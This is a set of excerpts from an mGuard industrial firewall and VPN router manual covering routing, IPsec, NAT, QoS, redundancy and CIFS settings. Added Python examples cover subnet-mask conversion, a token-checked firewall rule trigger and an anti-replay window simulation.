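    if bits != ((0xFFFFFFFF << (32 - prefix)) & 0xFFFFFFFF):
        raise ValueError(f"non-contiguous netmask {mask}")
    return prefix


def prefix_to_netmask(prefix: int) -> str:
    """24 -> 255.255.255.0, 27 -> 255.255.255.224."""
    if not 0 <= prefix <= 32:
        raise ValueError("prefix must be 0..32")
    return str(IPv4Address((0xFFFFFFFF << (32 - prefix)) & 0xFFFFFFFF))


# Routes the mGuard (internal address 192.168.11.1 in network A) needs for the
# diagram: networks B and C lie behind the router whose address in network A
# is 192.168.11.2, so both are reached via that gateway (assumption from the
# diagram). Network A itself is directly connected.
MGUARD_INTERNAL_ROUTES = [
    ("192.168.15.0/24", "192.168.11.2"),   # Network B
    ("192.168.27.0/24", "192.168.11.2"),   # Network C, behind network B's router
]
ON_LINK = "192.168.11.0/24"                # Network A


def next_hop(dst: str, routes=MGUARD_INTERNAL_ROUTES, on_link=ON_LINK):
    """Longest-prefix match: the gateway address, 'on-link' for network A,
    or None when no internal route covers the destination."""
    addr = IPv4Address(dst)
    if addr in IPv4Network(on_link):
        return "on-link"
    best = None
    for net, gw in routes:
        network = IPv4Network(net)
        if addr in network and (best is None or network.prefixlen > best[0]):
            best = (network.prefixlen, gw)
    return best[1] if best else None


if __name__ == "__main__":
    print(netmask_to_prefix("255.255.255.0"), prefix_to_netmask(27))
    for host in ("192.168.11.42", "192.168.15.7", "192.168.27.17", "10.1.2.3"):
        print(host, "->", next_hop(host))
```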
109. [Screenshots: QoS >> Egress Rules >> VPN, default egress queue rules for VPN via External, VPN via External 2 and VPN via Dial-in. Each list has the same three rules: From IP 0.0.0.0/0 (any) to 0.0.0.0/0 (any); current TOS/DSCP "TOS Minimize-Delay" to queue Urgent, "TOS Maximize-Reliability" to queue Important, "TOS Minimize-Cost" to queue Low Priority; new TOS/DSCP Unchanged in all three.]
110. 0 or later. If a maximum of three requests for a sign of life are issued, this causes an expired session to be detected and removed after six minutes. In previous versions the preset was 0. This means that no requests for a sign of life are sent. Please note that sign of life requests generate additional traffic. Specifies the maximum number of times a sign of life request to the partner may remain unanswered. For example, if a sign of life request should be made every 15 seconds and this value is set to 3, then the SEC Stick client connection is deleted if a sign of life is not detected after approximately 45 seconds. Concurrent session limits: The number of simultaneous sessions is limited for SEC Stick connections. Approximately 0.5 Mbytes of memory space is required for each session to ensure the maximum level of security. The restriction does not affect existing sessions; it only affects newly established connections. Maximum number of cumulative concurrent sessions for all users: 0 to 2147483647. Specifies the number of connections that are permitted for all users simultaneously. When 0 is set, no session is permitted. Maximum number of concurrent sessions for one user: 0 to 2147483647. Specifies the number of connections that are permitted for one user simultaneously. When 0 is set, no session is permitted. SEC Sti
111. Network >> Mobile Network >> General. Mobile Network Supervision: You can use the following probe targets to check whether data can actually be transmitted with an active mobile network connection with packet data transmission. To do so, probe targets (hosts) are pinged at specific intervals to see whether at least one of the targets can be reached. If the defined targets cannot be reached after specified intervals, the mobile network connection is reestablished. If SIM cards are available, the supervision runs as follows: If a probe target was reached, the connection to the provider of the SIM 1 card is maintained. If none of the probe targets could be reached, the connection switches to the provider of the other SIM card. If the SIM 2 connection was active, it switches back to SIM 1. This ensures that SIM 1 is used primarily. The mobile network connection is also monitored. The mobile network modem is restarted if an AT command times out (timeout: 30 seconds). Probe status: Indicates whether supervision is activated. Supervision is only activated under the following conditions: SIM card inserted; PIN correctly entered; Router mode or network mode set to Built-in mobile network modem; APN correctly entered; PPP authentication correctly stored. Network >> Mobile Netwo
112. 9.1.1 Importable Shares 230; 9.2 CIFS Integrity Monitoring >> CIFS Integrity Checking 232; 9.2.1 Settings 233; 9.2.2 Filename Patterns 240; 9.3 CIFS Integrity Monitoring >> CIFS AV Scan Connector 242; 9.3.1 CIFS Antivirus Scan Connector 242; 10 IPsec VPN menu 247; 10.1 IPsec VPN >> Global 247; 10.1.1 Options 247; 10.1.2 DynDNS Monitoring 253; 10.2 IPsec VPN >> Connections 254; 10.2.1 Connections 255; 10.2.2 General 257; 10.2.3 Authentication 269; 10.2.4 Firewall 276; 10.2.5 IKE Options 279; 10.3 IPsec VPN >> L2TP over IPsec 284; 10.3.1 L2TP Server
113. 250 frames/s (mGuard smart, mGuard core, mGuard pci SD, mGuard delta). Bidirectional includes traffic in both directions; for example, 1500 Mbps means that 750 Mbps is forwarded in each direction. Fail-over switching time: The fail-over switching time can be set to 1, 3 or 10 seconds in the event of errors. The upper limit of 1 second is currently only adhered to by the mGuard centerport, even under high load. 16.1.10 Limits of firewall redundancy. In Router network mode, firewall redundancy is only supported with the static mode. Access to the mGuard via the HTTPS, SNMP and SSH management protocols is only possible with an actual IP address from each mGuard. Access attempts to virtual addresses are rejected. The following features cannot be used with firewall redundancy: A secondary external Ethernet interface; A DHCP server; A DHCP relay; A SEC Stick server; A user firewall; CIFS Integrity Monitoring. The redundant pair must have the same configuration. Take this into account when making the following settings: NAT settings (masquerading, port forwarding and 1:1 NAT); Flood protection; Packet filter (firewall rules, MAC filter, advanced settings); Queues and rules for QoS. Some network connections may be interrupted following a network lobotomy. See Restoration in the ev
114. [Screenshot: Logging >> Browse local logs (Logging menu, 14.2), with the log category filters Common and CIFS Integrity Checking and the "Jump to firewall rule" function. The sample shows timestamped entries from 2011-10-27 11:31: ham (redundancy) state transitions such as "transitioned to state active", "active_waiting" and "faulty", component start/terminate messages, and a cron entry running cifsscan start_scan as root.]
115. The components of IPsec are the Authentication Header (AH), the Encapsulating Security Payload (ESP), the Security Association (SA) and the Internet Key Exchange (IKE). At the start of the session, the systems involved in communication must determine which technique should be used and the implications of this choice, e.g. Transport Mode or Tunnel Mode. In Transport Mode, an IPsec header is inserted between the IP header and the TCP or UDP header respectively in each IP datagram. Since the IP header remains unchanged, this mode is only suitable for host-to-host connections. In Tunnel Mode, an IPsec header and a new IP header are prefixed to the entire IP datagram. This means the original datagram is encrypted in its entirety and stored in the payload of the new datagram. Tunnel Mode is used in VPN applications: the devices at the ends of the tunnel ensure that the datagrams are encrypted/decrypted; in other words, the actual datagrams are completely protected during transfer over a public network. In a certificate, confirmation is provided by a certification authority (CA) that the certificate does actually belong to its owner. This is done by confirming specific owner properties. Furthermore, the certificate owner must possess the private key that matches the public key in the certificate (see X.509 certificate on page 363). Glossary. Example
116. IPsec VPN >> Connections >> Edit >> General Options. Interface to use for gateway setting "any": Internal, External, External 2, Dial-in, DMZ. Implicitly selected by the IP address specified to the right. External 2 and Dial-in are only for devices with a serial interface (see Network >> Interfaces on page 105). Selection of the Internal option is not permitted in Stealth mode. This interface setting is only considered when "any" is entered as the address of the VPN gateway on the partner. In this case, the interface of the mGuard through which it answers and permits requests for the establishment of this VPN connection is set here. The VPN connection can be established through the LAN and WAN port in all Stealth modes when External is selected. The interface setting allows encrypted communication to take place over a specific interface for VPN partners without a known IP address. If an IP address or host name is entered for the partner, then this is used for the implicit assignment to an interface. The mGuard can be used as a single-leg router in Router mode when Internal is selected, as both encrypted and decrypted VPN traffic for this VPN connection is transferred over the internal interface. IKE and IPsec data traffic is only possible through the primary IP address of the individual assigned interface. This also applies to VPN con
117. Active / Inactive / Disabled: Determines the output state of the firewall rule record following a reconfiguration or restart. The Active/Inactive setting is only applicable if a push button is connected. In case the firewall rule records are controlled via a switch or VPN connection, they have priority. If set to Disabled, the firewall rule record cannot be dynamically activated. It is retained but has no influence. Controlling service: Service input (CMD 1-3) / VPN connection input. The firewall rule record can be switched via a push button, switch or a VPN connection. The push button/switch must be connected to one of the service contacts (CMD 1-3). Token for text message trigger: Only available with the mGuard rs4000 3G. Incoming text messages can be used to activate or deactivate firewall rule records. The text message must contain the "fwrules active" or "fwrules inactive" command followed by the token. Deactivation Timeout: Activated firewall rule records are deactivated after this time has elapsed. 0 means the setting is switched off. Time in seconds: 0 to 86400 (1 day). Firewall rules: [table: 1 TCP, from 0.0.0.0/0 any, to 0.0.0.0/0 any, Accept, Log No; 2 TCP, from 0.0.0.0/0 any, to 0.0.0.0/0 any, Accept, Log No] Protocol: All means TCP, UDP, ICMP, GRE and other IP protocols. From IP: 0.0.0.0/0 means all IP addresses. To specify an address area, use CIDR
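An added reference model, not the mGuard's own implementation, of the text-message trigger and the Deactivation Timeout described above: it checks the "fwrules active/inactive <token>" form, compares the token in constant time, and expires an activated record after the timeout (0 = timeout switched off). The class, its names, the sample message texts and the token are constructed.

```python
"""Added example (not the mGuard's code): evaluating "fwrules active <token>"
and "fwrules inactive <token>" text messages for a firewall rule record."""
import hmac
from dataclasses import dataclass
from typing import Optional

MAX_TIMEOUT = 86400  # 1 day, the upper limit of the Deactivation Timeout field


@dataclass
class FirewallRuleRecord:
    name: str
    token: str                  # token configured for the text-message trigger
    deactivation_timeout: int   # seconds; 0 switches the timeout off
    active: bool = False
    expires_at: Optional[float] = None

    def __post_init__(self):
        if not 0 <= self.deactivation_timeout <= MAX_TIMEOUT:
            raise ValueError("Deactivation Timeout must be 0..86400 seconds")

    def handle_sms(self, text: str, now: float) -> str:
        """Apply one incoming text message; the return value is for the log."""
        parts = text.strip().split()
        # Expected form: "fwrules active <token>" or "fwrules inactive <token>"
        if (len(parts) != 3 or parts[0] != "fwrules"
                or parts[1] not in ("active", "inactive")):
            return "ignored: not a fwrules command"
        # Constant-time comparison so a wrong token cannot be told apart by timing.
        if not hmac.compare_digest(parts[2].encode(), self.token.encode()):
            return "rejected: bad token"
        if parts[1] == "active":
            self.active = True
            # With timeout 0 the record stays active until deactivated explicitly.
            self.expires_at = (now + self.deactivation_timeout
                               if self.deactivation_timeout else None)
            return "activated"
        self.active = False
        self.expires_at = None
        return "deactivated"

    def tick(self, now: float) -> bool:
        """Called periodically: deactivate once the timeout has elapsed.
        Returns the record's state after the check."""
        if self.active and self.expires_at is not None and now >= self.expires_at:
            self.active = False
            self.expires_at = None
        return self.active


if __name__ == "__main__":
    rec = FirewallRuleRecord("maintenance-access", "s3cret-token", 600)
    print(rec.handle_sms("fwrules active s3cret-token", now=1000.0))
    print("still active at 1599 s:", rec.tick(1599.0))
    print("still active at 1600 s:", rec.tick(1600.0))
    print(rec.handle_sms("fwrules active wrong-token", now=2000.0))
```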
118. C Stick connection, the Enabled option must be set to Yes. User Name: An SEC Stick connection with a uniquely assigned user name must be defined for every owner of a SEC Stick who has authorized access. This user name is used to uniquely identify the defined connections. Name: Name of the person. Company: Name of the company. The following page appears when you click on Edit: [Screenshot: SEC Stick >> Connections >> SEC Stick connections: General (Enabled, User Name, Comment, Contact, A descriptive name of the user, Company), SSH public key (including ssh-dss or ssh-rsa), SSH Port Forwarding (IP 192.168.47.11, Port 3389)] General: Enabled: As above. User Name: As above. Comment: Optional comment text. Contact: Optional comment text. A descriptive name of the user: Optional name of the person (repeated). Company: Optional; as above. SSH public key (including ssh-dss or ssh-rsa): Enter the SSH public key belonging to the SEC Stick in ASCII format in this field. The secret equivalent is stored on the SEC Stick. SSH Port Forwarding: List of allowed access and SSH port forwarding relating to the SEC Stick of the corresponding user. IP: IP address of the computer to which access is enabled. Port: Port number to be used when accessing the computer. QoS m
119. [table row: TCP, from 0.0.0.0/0 any, to 0.0.0.0/0 any, Drop, Log No] These rules specify which traffic from the outside is allowed to pass to the inside. Please note: Port settings are only meaningful for TCP and UDP. Log entries for unknown connection attempts: Yes. Network Security >> Packet Filter >> Incoming Rules. Incoming: Lists the firewall rules that have been set up. They apply for incoming data links that have been initiated externally. If no rule has been set, the data packets of all incoming connections (excluding VPN) are dropped (default settings). General firewall setting: Accept all incoming connections: the data packets of all incoming connections are allowed. Drop all incoming connections: the data packets of all incoming connections are discarded. Accept Ping only: the data packets of all incoming connections are discarded except for ping packets (ICMP). This setting allows all ping packets to pass. The integrated protection against brute force attacks is not effective in this case. Use the firewall ruleset below: displays further setting options. This menu item is not included in the scope of functions for the mGuard rs2000 3G and mGuard rs2000. The following settings are only visible if Use the firewall ruleset below is set. Interface: External, External 2, Any External. Specifies via which interface the data packets are received so that the rule applies to them. Any External refers to the Externa
120. CRL (certificate revocation list) and checks whether or not the certificates that are available to the mGuard are blocked. CRLs are issued by the CAs and contain the serial numbers of blocked certificates, e.g. certificates that have been reported stolen. On the CRL tab page (see CRL on page 203), specify the origin of the mGuard revocation lists. When CRL checking is enabled, a CRL must be configured for each issuer of certificates on the mGuard. Missing CRLs result in certificates being considered invalid. Revocation lists are verified by the mGuard using an appropriate CA certificate. Therefore all CA certificates that belong to a revocation list (all sub-CA certificates and the root certificate) must be imported on the mGuard. If the validity of a revocation list cannot be proven, it is ignored by the mGuard. If the use of revocation lists is activated together with the consideration of validity periods, revocation lists are ignored if, based on the system time, their validity has expired or has not yet started. If Enable CRL checking is set to Yes (see above), select the time period after which the revocation lists should be downloaded and applied. If CRL checking is enabled but CRL download is set to Never, the CRL must be manually loaded on the mGuard so that CRL checking can be performed.
Table: CIDR (Classless Inter-Domain Routing) notation. The prefix length after the slash gives the number of leading 1 bits in the subnet mask; each decimal octet of a mask corresponds to one of the binary octets below.

Binary octet   Decimal
11111111       255
11111110       254
11111100       252
11111000       248
11110000       240
11100000       224
11000000       192
10000000       128
00000000       0

Example: /24 corresponds to the subnet mask 255.255.255.0 (binary 11111111.11111111.11111111.00000000).
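The table maps prefix lengths to masks; the fields in this manual that take "the network in CIDR format" (Additional Internal Routes, Additional DMZ Routes) also need the network address itself to be correct. The following is an added example, not code from the manual or the mGuard firmware, of the conversions and the two checks worth doing before entering such a value: that the mask is contiguous and that no host bits are set in the network part. The addresses used are constructed.

```python
# Added example (not part of the mGuard manual or firmware): CIDR prefix
# lengths, dotted subnet masks and network membership, as used for the
# "Network" fields that take CIDR notation (e.g. Additional Internal Routes).

def dotted_to_int(addr):
    """'192.168.15.0' -> 3232239360; rejects malformed IPv4 addresses."""
    parts = addr.split(".")
    if len(parts) != 4:
        raise ValueError(f"bad IPv4 address: {addr!r}")
    value = 0
    for part in parts:
        octet = int(part)
        if not 0 <= octet <= 255:
            raise ValueError(f"bad octet in {addr!r}")
        value = (value << 8) | octet
    return value

def int_to_dotted(value):
    return ".".join(str((value >> shift) & 0xFF) for shift in (24, 16, 8, 0))

def prefix_to_mask(prefix):
    """/24 -> '255.255.255.0': the mask has `prefix` leading 1 bits."""
    if not 0 <= prefix <= 32:
        raise ValueError("prefix length must be 0..32")
    return int_to_dotted((0xFFFFFFFF << (32 - prefix)) & 0xFFFFFFFF)

def mask_to_prefix(mask):
    """'255.255.255.0' -> 24. A mask such as 255.0.255.0 (1 bits not
    contiguous) is rejected rather than silently counted."""
    value = dotted_to_int(mask)
    ones = bin(value).count("1")
    if value != (0xFFFFFFFF << (32 - ones)) & 0xFFFFFFFF:
        raise ValueError(f"{mask} is not a contiguous subnet mask")
    return ones

def parse_cidr(cidr):
    """'192.168.15.0/24' -> (network as int, prefix). Rejects host bits set,
    e.g. 192.168.15.1/24, a common configuration slip."""
    addr, _, prefix_text = cidr.partition("/")
    if not prefix_text:
        raise ValueError(f"missing prefix length in {cidr!r}")
    prefix = int(prefix_text)
    net = dotted_to_int(addr)
    mask = dotted_to_int(prefix_to_mask(prefix))
    if net & ~mask & 0xFFFFFFFF:
        raise ValueError(f"{cidr} has host bits set; the network is "
                         f"{int_to_dotted(net & mask)}/{prefix}")
    return net, prefix

def cidr_is_valid(cidr):
    try:
        parse_cidr(cidr)
        return True
    except ValueError:
        return False

def address_in_network(addr, cidr):
    """True if addr belongs to the network given in CIDR notation."""
    net, prefix = parse_cidr(cidr)
    mask = dotted_to_int(prefix_to_mask(prefix))
    return (dotted_to_int(addr) & mask) == net

if __name__ == "__main__":
    print(prefix_to_mask(24), mask_to_prefix("255.255.248.0"))
    print(address_in_network("192.168.15.7", "192.168.15.0/24"))
```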
IPsec VPN >> IPsec Status ..... 285
Global ..... 288
Connections ..... 291
Ingress Filters ..... 293
12.1.1 Internal / External ..... 293
Egress Queues ..... 296
12.2.1 Internal / External / External 2 / Dial-in ..... 296
Egress Queues (VPN) ..... 298
12.3.1 VPN via Internal / VPN via External / VPN via External 2 / VPN via Dial-in ..... 298
Egress Rules ..... 301
12.4.1 Internal / External / External 2 / Dial-in ..... 301
12.4.2 Egress Rules (VPN) ..... 302
Redundancy >> Firewall Redundancy ..... 305
13.1.1 Redundancy ..... 305
13.1.2 Connectivity Checks ..... 313
Redundancy >> FW Redundancy Status ..... 315
13.2.1 Redundancy Status ..... 315
13.2.2 Connectivity Status ..... 318
Ring Network Coupling
The mGuard devices for the machine controllers initiate VPN data traffic to the maintenance center and encapsulate the data packets sent to it. As soon as a connection is initiated, the maintenance center also automatically encapsulates the data packets sent to the relevant VPN partner.

Figure 10-1: TCP encapsulation in an application scenario with a maintenance center and machines maintained remotely via VPN connections (maintenance center mGuard; mGuard devices on machine controllers 1, 2 and 3).

Required basic settings, maintenance center mGuard:
IPsec VPN menu item, Global, Options tab page: Listen for incoming VPN connections which are encapsulated: Yes.
Connections submenu, General tab page: Address of the partner's VPN gateway: any; Connection startup: Wait.

Required basic settings, mGuard on machine controllers:
IPsec VPN menu item, Global, Options tab page: Listen for incoming VPN connections which are encapsulated: No.
Connections submenu, General tab page: Address of the partner's VPN gateway: fixed IP address or host name; Connection startup: Initiate or Initiate on traffic; Encapsulate the VPN traffic in TCP: Yes.

IPsec VPN >> Global >> Options, TCP Encapsulation

Listen for incoming VPN connections which are encapsulated: default setting No. Only set this option to Yes if the TCP Encapsulation function is used. Only then can the mGuard allow
mGuard industrial rs, mGuard blade, mGuard delta, EAGLE mGuard: see Secondary External Interface on page 116.

Network menu, 6.3.2 IP and Port Forwarding (Masquerading)

Network >> NAT >> IP and Port Forwarding

IP and Port Forwarding: lists the rules defined for port forwarding (DNAT, Destination NAT). The example rule in the screenshot is protocol TCP, from 0.0.0.0/0 (any source port), incoming on the external address at port http, redirected to IP 127.0.0.1, port http, log No.

Port forwarding performs the following: the headers of incoming data packets from the external network which are addressed to the external IP address (or one of the external IP addresses) of the mGuard and to a specific port of the mGuard are rewritten in order to forward them to a specific computer in the internal network and to a specific port on this computer. In other words, the IP address and port number in the header of incoming data packets are changed. This method is also referred to as Destination NAT.

Port forwarding cannot be used for connections initiated via the External 2 interface. External 2 is only available for devices with a serial interface.

The rules defined here have priority over the settings made under Network Security >> Packet Filter >> Incoming Rules.

Protocol: specify the protocol
mGuard rs4000 3G, mGuard rs4000 and mGuard industrial rs only. If a VPN connection is controlled via a VPN switch, then VPN redundancy cannot be activated (see under IPsec VPN >> Global >> Options >> VPN Switch).

During VPN state synchronization the state of the VPN connection is sent continuously from the active mGuard to the one on standby, so that it always has an up-to-date copy in the event of errors. The only exception is the state of the IPsec replay window: changes there are only transmitted sporadically. The volume of the data traffic for state synchronization does not depend on the data traffic sent over the VPN channels. The data volumes for state synchronization are defined by a range of parameters that are assigned to the ISAKMP SAs and IPsec SAs.

16.2.6 Handling VPN redundancy in extreme situations

The conditions listed under Handling firewall redundancy in extreme situations on page 338 also apply to VPN redundancy. They also apply when the mGuard is used exclusively for forwarding VPN connections. The mGuard forwards the data flows via the VPN channels and rejects incorrect packets regardless of whether firewall rules have been defined for the VPN connections or not. An error interrupts the flow of data traffic.

An error that interrupts the data traffic running via the VPN channels represents an extreme situation. In this case the IPsec data traffic is briefly vulnerable to replay attacks. A replay
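Why a sporadically synchronized replay window leaves a brief replay exposure is easiest to see with the window itself. The following is an added example, not mGuard code: a sliding anti-replay window in the style of IPsec ESP (highest sequence number plus a bitmap of the most recent numbers), a snapshot/restore pair standing in for the state synchronization, and a failover scenario in which the standby takes over with a stale window. The sequence numbers and the "captured packet" are constructed.

```python
# Added example (not mGuard code): an IPsec-style anti-replay window and a
# failover scenario with a stale window copy on the standby device.

class ReplayWindow:
    """Sliding anti-replay window: `top` is the highest sequence number
    accepted so far; bit i of `bitmap` is set when top - i has been seen
    (bit 0 = top). Only the `size` most recent numbers are tracked."""

    def __init__(self, size=64):
        self.size = size
        self.top = 0
        self.bitmap = 0

    def check_and_update(self, seq):
        """Return True and record seq if acceptable; False for a replay or a
        packet older than the window."""
        if seq <= 0:
            return False                       # ESP sequence numbers start at 1
        if seq > self.top:                     # right of the window: slide it
            shift = seq - self.top
            self.bitmap = ((self.bitmap << shift) | 1) & ((1 << self.size) - 1)
            self.top = seq
            return True
        diff = self.top - seq
        if diff >= self.size:
            return False                       # older than the window: reject
        if self.bitmap & (1 << diff):
            return False                       # already received: replay
        self.bitmap |= 1 << diff
        return True

    def snapshot(self):                        # stands in for state synchronization
        return (self.top, self.bitmap)

    def restore(self, snap):
        self.top, self.bitmap = snap


def failover_demo():
    active = ReplayWindow()
    for seq in range(1, 51):                   # packets 1..50 arrive at the active device
        if not active.check_and_update(seq):
            raise RuntimeError("unexpected reject")
    synced = active.snapshot()                 # the only (sporadic) window sync to the standby
    for seq in range(51, 101):                 # packets 51..100 arrive; no further sync
        if not active.check_and_update(seq):
            raise RuntimeError("unexpected reject")
    captured = 80                              # an attacker recorded packet 80 on the wire

    standby = ReplayWindow()
    standby.restore(synced)                    # failover: standby starts from the stale copy
    return {
        "active_rejects_replay": not active.check_and_update(captured),
        "stale_standby_accepts_replay": standby.check_and_update(captured),
        "standby_rejects_second_replay": not standby.check_and_update(captured),
    }


if __name__ == "__main__":
    for case, result in failover_demo().items():
        print(f"{case}: {result}")
```

The exposure is bounded: as soon as the standby has seen traffic beyond the replayed range, the same packet is rejected again, which is why the manual calls the vulnerability brief rather than permanent.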
Network example (see Network example diagram on page 25):
Computers with IP addresses 192.168.11.3, 192.168.11.4, 192.168.11.5, 192.168.11.6 and 192.168.11.7; subnet mask 255.255.255.0.
Network B (192.168.15.0/24), reached via an additional internal route: computers 192.168.15.2, 192.168.15.3, 192.168.15.4 and 192.168.15.5; subnet mask 255.255.255.0; gateway 192.168.11.2.
Network C (192.168.27.0/24): computers 192.168.27.1, 192.168.27.2, 192.168.27.3 and 192.168.27.4; subnet mask 255.255.255.0; gateway 192.168.11.2.

3 Changes compared to the previous version

3.1 Overview of modifications in version 8.1

The following functions have been added to firmware version 8.1:
- User firewall in VPN connections
- Dynamic activation of the firewall rules
- Function extension of the service contacts
- OPC Inspector for Deep Packet Inspection for OPC Classic
- Extended DynDNS providers
- New mode for the Pre-Shared Secret authentication method
- On the web interface, dynamic modifications are displayed in red
- Detailed logging of modems

3.1.1 User firewall in VPN connections

The user firewall can be used within VPN connections. A VPN connection in which t
MAC filter is applied to frames that the mGuard receives at the WAN interface. The Outgoing MAC filter is applied to frames that the mGuard receives at the LAN interface. Data packets that are received or sent via a modem connection (on models with a serial interface) are not picked up by the MAC filter, because the Ethernet protocol is not used there.

In Stealth mode, in addition to the packet filter (Layer 3/4) that filters data traffic e.g. according to ICMP messages or TCP/UDP connections, a MAC filter (Layer 2) can also be set. A MAC filter (Layer 2) filters according to MAC addresses and Ethernet protocols. In contrast to the packet filter, the MAC filter is stateless: if rules are introduced, corresponding rules must also be created for the opposite direction. If no rules are set, all ARP and IP packets are allowed to pass through. When setting MAC filter rules, please note the information displayed on the screen. The rules defined here have priority over packet filter rules. The MAC filter does not support logging. Bear in mind that a source MAC address is easily forged, so the MAC filter narrows exposure but does not authenticate the sender.

Network Security >> Packet Filter >> MAC Filtering

Incoming
Source MAC: specification of the source MAC address. XX:XX:XX:XX:XX:XX stands for all MAC addresses.
Destination MAC: specification of the destination MAC address. XX:XX:XX:XX:XX:XX stands for all MAC addresses; ff:ff:ff:ff:ff:ff stands for the broadcast MAC address, to which all ARP requests, for example, are sent.
Ethernet Protocol
Input CMD 1-3: if starting and stopping the VPN connection via the CMD contact is enabled, only the CMD contact is authorized to do this, i.e. setting this option to Enabled for the entire VPN connection has no effect. However, if a button is connected to the CMD contact instead of a switch (see below), the connection can also be established and disconnected using the CGI script command nph-vpn.cgi or via a text message, which has the same rights. If a VPN connection is controlled via a VPN switch, then VPN redundancy cannot be activated.

IPsec VPN >> Connections >> Edit >> General

Use inverted control logic: inverts the behavior of the connected switch. If the switching service input is configured as an on/off switch, it can activate one VPN connection and deactivate another.
Deactivation Timeout: time after which the VPN connection is deactivated if it has been started via a text message, switch, button, nph-vpn.cgi or the web interface. VPN connections which have been started by an explicit request via an application are not affected. Time in minutes, 0 to 10000 (approx. 1 week); 0 means the setting is switched off.
Token for text message trigger
Encapsulate the VPN traffic in TCP
TCP Port of the server which accepts the encapsulated connection: only visible if Encapsulate the VPN traffic in TCP is set to Yes.
Management >> System Settings >> E-Mail

Make sure that the e-mail settings for the mGuard are correctly configured.

E-Mail notifications
Sender address of e-mail notifications: e-mail address which is displayed as the sender ("from") of mails sent by the mGuard.
Address of the e-mail server
Port number of the e-mail server
Encryption mode for the e-mail server: No Encryption, TLS Encryption, or TLS Encryption with StartTLS. With No Encryption the SMTP login name, the password and the notification text cross the network in clear text; use one of the TLS modes wherever the mail server supports it.
SMTP Login name: user name for the e-mail server.
SMTP Password: password for the e-mail server.
Change notification for ... contact your support staff.

Any e-mail recipients can be linked with predefined events and a freely definable message. The list is processed from top to bottom.
E-Mail recipient: specifies the e-mail address. When the selected event occurs (or the event is configured for the first time), the linked recipient address is selected and the event is sent to them via e-mail.
Event: an e-mail message can also be stored and sent. Some of the events listed depend on the hardware used. A complete list of all events can be found in the Event table on page 53.
Selector: a configured VPN connection can be selected here, which is then monitored via e-mail.
E-Mail Subject: text that appears in the subject line of the e-mail.
Network >> Interfaces >> General, Router network mode, static router mode

IP of default gateway: the IP address of a device in the local network connected to the LAN port, or the IP address of a device in the external network connected to the WAN port, can be specified here. If the mGuard establishes the transition to the Internet, this IP address is assigned by the Internet service provider (ISP). If the mGuard is used within the LAN, the IP address of the default gateway is assigned by the network administrator. If the local network is not known to the external router (e.g. in the event of configuration via DHCP), specify your local network under Network >> NAT (see page 152).
DMZ Networks: see DMZ Networks on page 124.
Internal Networks: see Internal Networks on page 123.
Secondary External Interface: see Secondary External Interface on page 116.

Router network mode, DHCP router mode

Network Status (example from the web interface): External IP address 172.16.66.49 (active); default route 172.16.66.18; used DNS servers 10.1.0.253. Network Mode: Router; Router Mode: DHCP.

There are no additional setting options for Router network mode, DHCP router mode.

Network >> Interfaces >> General, Router network mode, DHCP router mode
Internal Networks: see Intern
PoE / PPTP / Modem / Built-in Modem / Built-in mobile network modem, and Stealth only (multiple clients in Stealth mode). Modem / Built-in modem / Built-in mobile network modem is not available for all mGuard models (see Network >> Interfaces on page 105).

For IP connections via a VPN connection with active masquerading, the firewall rules for outgoing data in the VPN connection are applied to the original source address of the connection.

1:1 NAT: with 1:1 NAT in VPN it is still possible to enter the network addresses actually used to specify the tunnel beginning and end independently of the tunnel parameters agreed with the partner.

Figure 10-3: 1:1 NAT. The IPsec tunnel runs over the Internet between the local network and the remote network; the network address for 1:1 NAT and the network address for remote 1:1 NAT are entered on the respective sides.

10.2.3 Authentication

IPsec VPN >> Connections >> Mannheim-Leipzig, tab pages General, Authentication, Firewall, IKE Options. Authentication tab page:
Authentication method: X.509 Certificate
Local X.509 Certificate: VPN Endpunkt Kundendienst MA
Remote CA Certificate: No CA certificate, but the Remote Certificate below
Remote Certificate: Subject CN=VPN Endpunkt Maschine 06, L=L, O=Beispiel Lieferant, C=
PoE / PPTP / Modem mode are as follows: IP address 192.168.1.1, netmask 255.255.255.0. You can also specify other addresses via which the mGuard can be accessed by devices in the locally connected network. For example, this can be useful if the locally connected network is divided into subnetworks. Multiple devices in different subnetworks can then access the mGuard via different addresses.

IP: IP address via which the mGuard can be accessed via its LAN port.
Netmask: the subnet mask of the network connected to the LAN port.
Use VLAN: if the IP address should be within a VLAN, set this option to Yes.

Network >> Interfaces >> General, Router network mode

VLAN ID: a VLAN ID between 1 and 4095. For an explanation of the term VLAN please refer to the glossary on page 364. If you want to delete entries from the list, please note that the first entry cannot be deleted.
Additional Internal Routes: additional routes can be defined if further subnetworks are connected to the locally connected network.
Network: specify the network in CIDR format (see CIDR (Classless Inter-Domain Routing) on page 24).
Gateway: the gateway via which this network can be accessed.
DMZ Networks, DMZ IPs (only available with the mGuard rs4000 3G with internal switch): Netmask; Additional DMZ Routes (Network, Gateway).
S Antivirus Scan Connector. The references to the network drives can be set as follows: for CIFS integrity checking see Checked CIFS Share on page 234; for the CIFS Antivirus Scan Connector see CIFS Antivirus Scan Connector on page 242.

9.1.1 Importable Shares

CIFS Integrity Monitoring >> Importable Shares

Importable CIFS Shares: here you can specify the CIFS shares to which the mGuard has access.
Name: name of the network drive to be checked (internal name used in the configuration).
Server: IP address of the authorizing server.
CIFS Share: name of the network drive made available by the authorizing server.
Click on Edit to make the settings.

CIFS Integrity Monitoring >> Importable Shares >> Edit (example: share System32)
Identification for Reference: Name: System32.
Location of the Importable Share: IP address of the server: 192.168.1.10; Imported share's name: System32.
Authentication for mounting the Share: Domain/Workgroup: WORKGROUP; NetBIOS name (Windows 98 only).
Specifies how many sequentially performed test runs must return a negative result before the mGuard activates the secondary external interface. The result of a test run is negative if none of the ping tests it contains were successful. The number specified here also indicates how many consecutive test runs must be successful, after the secondary external interface has been activated, before this interface is deactivated again.

DNS Mode (only relevant if the secondary external interface is activated in temporary mode): the DNS mode selected here specifies which DNS server the mGuard uses for temporary connections established via the secondary external interface.
Use primary DNS settings untouched: the DNS servers defined under Network >> DNS Server (see Network >> NAT on page 152) are used.
DNS Root Servers: requests are sent to the root name servers on the Internet, whose IP addresses are stored on the mGuard. These addresses rarely change.
Provider defined (via PPP dial-up): the domain name servers of the Internet service provider that provides access to the Internet are used.
User defined (from field below): if this setting is selected, the mGuard will connect to the domain name servers listed under User defined name servers.
1 mGuard basics

The mGuard protects IP data links by combining the following functions: network features, firewall features and anti-virus features.

VPN router: VPN (Virtual Private Network) for secure data transmission via public networks; hardware-based DES, 3DES and AES encryption; IPsec protocol. (DES and 3DES are no longer considered adequate ciphers; prefer AES wherever the VPN partner supports it.)
